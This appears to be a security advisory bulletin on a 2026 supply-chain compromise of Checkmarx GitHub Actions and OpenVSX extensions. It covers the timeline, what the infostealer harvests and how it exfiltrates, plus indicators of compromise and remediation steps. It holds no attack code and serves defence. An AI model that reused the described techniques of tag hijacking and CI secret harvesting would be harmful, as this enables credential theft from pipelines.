AgenceEvana
Back to bulletins
Critical2026-03-28CVSS 9.4CVE-2026-33634 (2026-03-21)supply-chainci-cdgithub-actionscheckmarxsast

TeamPCP Hits Checkmarx — Supply Chain Campaign Expands to SAST Scanners

The TeamPCP group, already behind the Trivy compromise, expands its campaign to Checkmarx GitHub Actions (KICS, AST) and VS Code extensions, stealing CI/CD secrets and cloud tokens at scale.

Context

Four days after compromising Trivy (see our dedicated bulletin), the threat actor TeamPCP / DeadCatx3 expanded their supply chain campaign to Checkmarx, targeting its GitHub Actions and VS Code extensions. The attack confirms a deliberate strategy: strike security tools themselves to reach as many CI/CD pipelines as possible.

Attack Timeline

March 19 — Initial Trivy compromise (binaries, GitHub Actions, Docker Hub images).

March 22 — Campaign expands to Trivy Docker images (v0.69.5, v0.69.6).

March 23, 12:58–16:50 UTC — TeamPCP compromises Checkmarx GitHub Actions:

  • 35 tags hijacked via force-push in checkmarx/kics-github-action and checkmarx/ast-github-action
  • Tags point to malicious commits containing an upgraded infostealer
  • Malicious VS Code extensions published on the OpenVSX registry: cx-dev-assist v1.7.0 and ast-results v2.53.0 (available ~3 hours before takedown)

Attack Vector

The attacker reused CI/CD credentials stolen during the Trivy compromise. The payload injected into GitHub Actions:

  • Harvests environment variables, cloud tokens (AWS, GCP, Azure), SSH keys, and Kubernetes tokens
  • Adds a Kubernetes persistence module not present in the Trivy version
  • Includes a fallback mechanism using GITHUB_TOKEN to create an exfiltration repository (docs-tpcp) under the victim's account

Indicators of Compromise (IOCs)

C2 infrastructure:

  • Domain: checkmarx.zone (typosquatted)
  • IP: 83.142.209.11
  • Fallback: GitHub repository docs-tpcp automatically created in victim accounts

Artifacts: tpcp.tar.gz, payload.enc

Compromised extensions: cx-dev-assist 1.7.0, ast-results 2.53.0 (OpenVSX only)

Compromised GitHub Actions: checkmarx/kics-github-action and checkmarx/ast-github-action (35 tags between 12:58 and 16:50 UTC on March 23)

Detection: search GitHub Actions logs for any references to tpcp.tar.gz, checkmarx.zone, or docs-tpcp. Check if a docs-tpcp repository exists under your GitHub accounts.

Impact

  • Any user of the compromised GitHub Actions during the window (12:58–16:50 UTC, March 23) has potentially exposed their CI/CD secrets
  • The payload is an infostealer targeting: environment variables, cloud tokens, database credentials, SSH keys, Kubernetes tokens
  • Malicious VS Code extensions were downloadable for ~3 hours

Remediation

  1. Immediately rotate all secrets accessible to workflows that used the compromised actions.
  2. Pin GitHub Actions by commit SHA (uses: action@sha256:abc...) — tags are mutable.
  3. Audit workflow logs from March 19–23 for connections to checkmarx.zone, scan.aquasecurtiy.org, or 83.142.209.11.
  4. Check installed VS Code extensions — uninstall cx-dev-assist 1.7.0 and ast-results 2.53.0 if installed from OpenVSX.
  5. Check your GitHub organization for docs-tpcp or tpcp-docs repositories (exfiltration mechanisms).
  6. Update to the corrected versions published by Checkmarx.

The TeamPCP Pattern

This campaign illustrates a tactical evolution: the same set of stolen credentials is reused in a cascade to compromise related projects. Trivy → Checkmarx → potentially more tools. CISA added CVE-2026-33634 to its KEV catalog on March 25, 2026.

Back to bulletins